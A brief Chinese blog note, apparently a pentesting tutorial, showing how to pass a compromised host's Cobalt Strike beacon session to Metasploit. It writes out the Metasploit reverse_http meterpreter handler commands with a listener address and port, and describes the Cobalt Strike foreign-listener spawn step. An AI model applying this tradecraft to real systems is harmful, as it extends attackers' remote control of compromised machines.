Cobalt strike 派生shell给MSF,前提是要有beaconshell:
在msf使用监听模块,并设置相关选项:
use exploit/multi/handle
set payload windows/meterpreter/reverse_http
set lhost 10.6.18.56
set lport 4321
run -j
文章图片
回到Cobalt strike中添加监听器payload为 windows/foreign/reverse_httpc,ip为msf的ip监听端口为msf监听的端口:
文章图片
下面为刚创建的监听器:
文章图片
选中要派生的shell右击spawn选择刚刚创建的监听器:
文章图片
文章图片
点击Choose
我是汉化版的叫增加会话,英文版为spawn,一样的。
【笔记|Cobalt strike 派生shell给MSF】回到msf,输入sessions -i 5 命令 ,我们可以看到获取到了meterpreter会话:
文章图片
推荐阅读
- Web安全|CobaltStrike基础使用
- 渗透测试|CobaltStrike(CS)与MetasploitFramework(MSF)联动
- 笔记|初步认识机器学习(Machine Leaning)
- 学习|Python3学习
- 笔记|15天完成民猫电商毕设——消息模块收尾(12th day)
- 笔记|网络(数通-服务器-web安全)之校招小记
- 数据库基本操作|SQL Server 添加字段 修改字段 删除字段 语句
- 笔记|直接利用pycharm打包python的一些经验总结()
- 笔记|Sa-token简单介绍和基本使用